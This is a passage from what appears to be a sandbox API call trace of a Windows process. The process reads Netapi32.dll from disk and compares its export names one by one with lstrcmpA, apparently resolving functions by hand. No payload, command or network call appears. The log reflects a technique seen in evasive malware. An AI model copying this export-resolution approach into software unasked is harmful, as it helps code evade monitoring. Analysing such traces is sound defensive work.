(lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0168.387] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0168.387] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0168.387] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0168.387] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0168.387] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0168.387] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0168.388] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0168.388] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0168.388] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0168.388] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0168.398] GetProcessHeap () returned 0x450000 [0168.398] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x3a7d010 | out: hHeap=0x450000) returned 1 [0168.398] GetProcessHeap () returned 0x450000 [0168.398] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4691c0 [0168.400] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0168.539] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0168.539] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0168.540] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0168.540] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0168.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0168.541] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0168.541] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0168.541] GetProcessHeap () returned 0x450000 [0168.541] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13b00) returned 0x2d45030 [0168.541] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0168.541] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0168.542] CloseHandle (hObject=0x17c) returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0168.542] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0168.543] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0168.544] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0168.545] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0168.546] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0168.547] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0168.548] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0168.549] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0168.550] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0168.552] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0168.553] lstrcmpA (lpString1="NetAccessGetInfo", 